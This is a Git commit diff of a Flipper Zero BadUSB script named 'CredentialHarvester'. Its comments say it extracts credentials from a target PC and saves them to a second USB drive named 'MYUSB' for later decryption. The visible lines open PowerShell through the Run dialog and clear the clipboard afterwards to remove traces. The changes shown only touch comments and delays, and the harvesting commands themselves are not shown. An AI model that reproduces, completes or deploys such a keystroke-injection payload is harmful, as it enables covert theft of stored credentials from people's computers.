Update 0. CredentialHarvester
This commit is contained in:
@@ -1,11 +1,13 @@
|
||||
REM This script was created by github.com/markcyber
|
||||
REM This script requires a secondary USB named "MYUSB" to save credentials to
|
||||
REM The extracted data will require decryption
|
||||
REM ##############################################################################################################
|
||||
REM ################# This script was created by github.com/markcyber #############
|
||||
REM ################# This script requires a secondary USB named "MYUSB" to save credentials to #############
|
||||
REM ################# The extracted data will require decryption #############
|
||||
REM ################# Set delay for Flipper Zero #############
|
||||
REM ##############################################################################################################
|
||||
|
||||
REM Set delay for Flipper Zero
|
||||
DELAY 1000
|
||||
|
||||
REM Open PowerShell with elevated privileges
|
||||
DELAY 1000
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell
|
||||
@@ -49,7 +51,7 @@ STRING }
|
||||
ENTER
|
||||
DELAY 500
|
||||
|
||||
REM Clear the clipboard to remove any sensitive data (This is not necessary, unless you did something on targetPC)
|
||||
REM Clear the clipboard to remove any sensitive data (This is not necessary, unless you did something on target PC)
|
||||
STRING echo off | clip
|
||||
ENTER
|
||||
DELAY 500
|
||||
|
||||
Reference in New Issue
Block a user